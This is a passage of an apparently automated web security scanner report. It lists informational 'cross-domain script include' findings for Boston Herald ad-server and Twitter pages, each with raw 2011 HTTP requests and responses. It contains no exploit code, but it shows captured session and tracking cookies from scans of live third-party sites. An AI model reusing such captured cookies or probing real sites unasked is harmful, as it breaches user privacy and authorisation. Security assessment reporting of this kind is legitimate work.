GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle1 HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801DO8kADVvc; __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1247593866-1296251843767; RMFD=011PiwJwO101yed8|O1021J3t|O1021J48; NSC_d12efm_qppm_iuuq=ffffffff09499e4045525d5f4f58455e445a4a423660; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; __utmb=235728274.56.10.1296251844

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 23:00:14 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PiwJwO101yed8|O1021J3t|O2021J48|P1021J4T; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.bostonherald.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1415
Content-Type: application/x-javascript

document.write ('<script language="JavaScript" src="http://a.collective-media.net/adj/q1.bosherald/be_ent_fr;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/1301504618/Middle1/BostonHerald/quadrant1_entHP300x250b_2010/quadrant1_entHP300x250b_2010.html/72634857383031444f386b4144567663?;ord=1301504618?" type="text/javascript"></script>
...[SNIP]...

18.308. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oascentral.bostonherald.com
Path:	/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle1

Issue detail

The response dynamically includes the following script from another domain:

http://a.collective-media.net/adj/q1.bosherald/be_ent;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/454587819/Middle1/BostonHerald/quadrant1_entROS300x250b_2010/quadrant1_entROS300x250b_2010.html/72634857383031444f386b4144567663?;ord=454587819?

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle1 HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801DO8kADVvc; __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1247593866-1296251843767; RMFD=011PiwJwO101yed8|O1021J3t|O3021J48|P2021J4T|P1021J4m; NSC_d12efm_qppm_iuuq=ffffffff09419e5f45525d5f4f58455e445a4a423660; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; __utmb=235728274.134.10.1296251844

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 00:47:00 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PiwJwO101yed8|O1021J3t|O3021J48|P2021J4T|P2021J4m; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.bostonherald.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1407
Content-Type: application/x-javascript

document.write ('<script language="JavaScript" src="http://a.collective-media.net/adj/q1.bosherald/be_ent;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/454587819/Middle1/BostonHerald/quadrant1_entROS300x250b_2010/quadrant1_entROS300x250b_2010.html/72634857383031444f386b4144567663?;ord=454587819?" type="text/javascript"></script>
...[SNIP]...

18.309. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oascentral.bostonherald.com
Path:	/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle1

Issue detail

The response dynamically includes the following script from another domain:

http://a.collective-media.net/adj/q1.bosherald/be_ent_fr;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/710762294/Middle1/BostonHerald/quadrant1_entHP300x250b_2010/quadrant1_entHP300x250b_2010.html/72634857383031444f386b4144567663?;ord=710762294?

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle1 HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801DO8kADVvc; __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1247593866-1296251843767; NSC_d12efm_qppm_iuuq=ffffffff09499e4045525d5f4f58455e445a4a423660; RMFD=011PiwJwO101yed8|O1021J3t|O2021J48|P2021J4T|P1021J4m; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; __utmb=235728274.101.10.1296251844

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 00:01:55 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PiwJwO101yed8|O1021J3t|O3021J48|P2021J4T|P1021J4m; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.bostonherald.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1408
Content-Type: application/x-javascript

document.write ('<script language="JavaScript" src="http://a.collective-media.net/adj/q1.bosherald/be_ent_fr;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/710762294/Middle1/BostonHerald/quadrant1_entHP300x250b_2010/quadrant1_entHP300x250b_2010.html/72634857383031444f386b4144567663?;ord=710762294?" type="text/javascript"></script>
...[SNIP]...

18.310. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oascentral.bostonherald.com
Path:	/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle1

Issue detail

The response dynamically includes the following script from another domain:

http://a.collective-media.net/adj/q1.bosherald/be_ent_fr;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/1194202561/Middle1/BostonHerald/quadrant1_entHP300x250b_2010/quadrant1_entHP300x250b_2010.html/72634857383031444f386b4144567663?;ord=1194202561?

Request

Response

18.311. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oascentral.bostonherald.com
Path:	/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle1

Issue detail

The response dynamically includes the following script from another domain:

http://d3.zedo.com/jsc/d3/fo.js

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle1 HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801DO8kADVvc; NSC_d12efm_qppm_iuuq=ffffffff09419e4445525d5f4f58455e445a4a423660; RMFD=011PiwJwO101yed8; __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1247593866-1296251843767; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; __utmb=235728274.11.10.1296251844

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:58:06 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 332
Content-Type: application/x-javascript

document.write ('<script language="JavaScript">\n');
document.write ('var zflag_nid="951"; var zflag_cid="2"; var zflag_sid="2"; var zflag_width="300"; var zflag_height="250"; var zflag_sz="9"; \n');

...[SNIP]...
</script>\n');
document.write ('<script language="JavaScript" src="http://d3.zedo.com/jsc/d3/fo.js"></script>
...[SNIP]...

18.312. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oascentral.bostonherald.com
Path:	/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle1

Issue detail

The response dynamically includes the following script from another domain:

http://a.collective-media.net/adj/q1.bosherald/be_ent;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/2134060438/Middle1/BostonHerald/quadrant1_entROS300x250b_2010/quadrant1_entROS300x250b_2010.html/72634857383031444f386b4144567663?;ord=2134060438?

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle1 HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801DO8kADVvc; __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1247593866-1296251843767; RMFD=011PiwJwO101yed8|O1021J3t|O2021J48|P1021J4T; NSC_d12efm_qppm_iuuq=ffffffff09499e4045525d5f4f58455e445a4a423660; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; __utmb=235728274.89.10.1296251844

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 23:45:22 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PiwJwO101yed8|O1021J3t|O2021J48|P2021J4T|P1021J4m; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.bostonherald.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1414
Content-Type: application/x-javascript

document.write ('<script language="JavaScript" src="http://a.collective-media.net/adj/q1.bosherald/be_ent;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/2134060438/Middle1/BostonHerald/quadrant1_entROS300x250b_2010/quadrant1_entROS300x250b_2010.html/72634857383031444f386b4144567663?;ord=2134060438?" type="text/javascript"></script>
...[SNIP]...

18.313. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Top previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oascentral.bostonherald.com
Path:	/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Top

Issue detail

The response dynamically includes the following script from another domain:

http://d3.zedo.com/jsc/d3/fo.js

Request

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:58:06 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: application/x-javascript

document.write ('<script language="JavaScript">\n');
document.write ('var zflag_nid="951"; var zflag_cid="7/2"; var zflag_sid="2"; var zflag_width="728"; var zflag_height="90"; var zflag_sz="14"; \n')
...[SNIP]...
</script>\n');
document.write ('<script language="JavaScript" src="http://d3.zedo.com/jsc/d3/fo.js"></script>
...[SNIP]...

18.314. http://oascentral.bostonherald.com/RealMedia/ads/adstream_mjx.ads/www.carfind.com/1222741686@Top1,Right1,Right2,Right3 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oascentral.bostonherald.com
Path:	/RealMedia/ads/adstream_mjx.ads/www.carfind.com/1222741686@Top1,Right1,Right2,Right3

Issue detail

The response dynamically includes the following script from another domain:

http://d3.zedo.com/jsc/d3/fo.js

Request

Response

18.315. http://scores.heraldinteractive.com/merge/tsnform.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://scores.heraldinteractive.com
Path:	/merge/tsnform.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://edge.quantserve.com/quant.js
http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/sports/home@x01!x01

Request

Response

18.316. http://twitter.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://a2.twimg.com/a/1296179758/javascripts/fronts.js
http://a2.twimg.com/a/1296179758/javascripts/widgets/widget.js?1296181158
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js

Request

Response

18.317. http://twitter.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://a1.twimg.com/a/1296179758/javascripts/widgets/widget.js?1296182903
http://a2.twimg.com/a/1296179758/javascripts/fronts.js
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js

Request

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:31:36 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225096-73325-20685
ETag: "28966c2e8cd7a0cf5cb06ed4fc8bc5a3"
Last-Modified: Fri, 28 Jan 2011 14:31:36 GMT
X-Runtime: 0.01128
Content-Type: text/html; charset=utf-8
Content-Length: 44208
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=8">
<meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
</h2>

<script src="http://a1.twimg.com/a/1296179758/javascripts/widgets/widget.js?1296182903" type="text/javascript"></script>
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/fronts.js" type="text/javascript"></script>
...[SNIP]...

18.318. http://twitter.com/247realmedia previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/247realmedia

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726
http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726
http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726
http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726
http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726
http://a3.twimg.com/a/1296179758/javascripts/dismissable.js?1296181726
http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:06:08 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296234368-40068-57715
ETag: "f2ddcf301113c2efcb23646f68ea6493"
Last-Modified: Fri, 28 Jan 2011 17:06:08 GMT
X-Runtime: 0.01625
Content-Type: text/html; charset=utf-8
Content-Length: 49998
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2E6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--1fee8dfc989eabd14b8fe40bb5047ae7f4f0da07; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/dismissable.js?1296181726" type="text/javascript"></script>
...[SNIP]...

18.319. http://twitter.com/AddThis previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/AddThis

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296245718/javascripts/lib/mustache.js?1296248415
http://a1.twimg.com/a/1296245718/javascripts/dismissable.js?1296248415
http://a1.twimg.com/a/1296245718/javascripts/geov1.js?1296248415
http://a1.twimg.com/a/1296245718/javascripts/twitter.js?1296248415
http://a3.twimg.com/a/1296245718/javascripts/api.js?1296248415
http://a3.twimg.com/a/1296245718/javascripts/lib/gears_init.js?1296248415
http://a3.twimg.com/a/1296245718/javascripts/lib/jquery.tipsy.min.js?1296248415
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:41:22 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265282-57668-31881
ETag: "a2ed93258e38abb440f9997e5bc5343f"
Last-Modified: Sat, 29 Jan 2011 01:41:22 GMT
X-Runtime: 0.00798
Content-Type: text/html; charset=utf-8
Content-Length: 49756
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6D2NyZWF0ZWRfYXRsKwgzTvDMLQE6B2lkIiUxYzk1MzQ4MWE0MmZkZTlj%250AMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6%250ARmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7AA%253D%253D--a144f2d48721ec13cc6db17b0167bf7e0dce4447; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296245718/javascripts/twitter.js?1296248415" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296245718/javascripts/lib/jquery.tipsy.min.js?1296248415" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296245718/javascripts/lib/gears_init.js?1296248415" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296245718/javascripts/lib/mustache.js?1296248415" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296245718/javascripts/geov1.js?1296248415" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296245718/javascripts/api.js?1296248415" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296245718/javascripts/lib/mustache.js?1296248415" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296245718/javascripts/dismissable.js?1296248415" type="text/javascript"></script>
...[SNIP]...

18.320. http://twitter.com/Applebees previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/Applebees

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296245718/javascripts/geov1.js?1296247836
http://a1.twimg.com/a/1296245718/javascripts/api.js?1296247836
http://a1.twimg.com/a/1296245718/javascripts/lib/gears_init.js?1296247836
http://a2.twimg.com/a/1296245718/javascripts/lib/jquery.tipsy.min.js?1296247836
http://a2.twimg.com/a/1296245718/javascripts/lib/mustache.js?1296247836
http://a3.twimg.com/a/1296245718/javascripts/dismissable.js?1296247836
http://a3.twimg.com/a/1296245718/javascripts/twitter.js?1296247836
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:52:53 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265973-32426-51080
ETag: "6de1ef610ac1e89e0f9514036de3e619"
Last-Modified: Sat, 29 Jan 2011 01:52:53 GMT
X-Runtime: 0.01745
Content-Type: text/html; charset=utf-8
Content-Length: 51962
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296245718/javascripts/twitter.js?1296247836" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296245718/javascripts/lib/jquery.tipsy.min.js?1296247836" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296245718/javascripts/lib/gears_init.js?1296247836" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296245718/javascripts/lib/mustache.js?1296247836" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296245718/javascripts/geov1.js?1296247836" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296245718/javascripts/api.js?1296247836" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296245718/javascripts/lib/mustache.js?1296247836" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296245718/javascripts/dismissable.js?1296247836" type="text/javascript"></script>
...[SNIP]...

18.321. http://twitter.com/AshieApple previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/AshieApple

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296258363/javascripts/geov1.js?1296262534
http://a1.twimg.com/a/1296258363/javascripts/api.js?1296262534
http://a1.twimg.com/a/1296258363/javascripts/lib/gears_init.js?1296262534
http://a2.twimg.com/a/1296258363/javascripts/lib/jquery.tipsy.min.js?1296262534
http://a2.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296262534
http://a3.twimg.com/a/1296258363/javascripts/dismissable.js?1296262534
http://a3.twimg.com/a/1296258363/javascripts/twitter.js?1296262534
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:52:52 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265972-35369-4983
ETag: "d630e94c0555a4dba001b1cdb5e86f78"
Last-Modified: Sat, 29 Jan 2011 01:52:52 GMT
X-Runtime: 0.01071
Content-Type: text/html; charset=utf-8
Content-Length: 29081
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
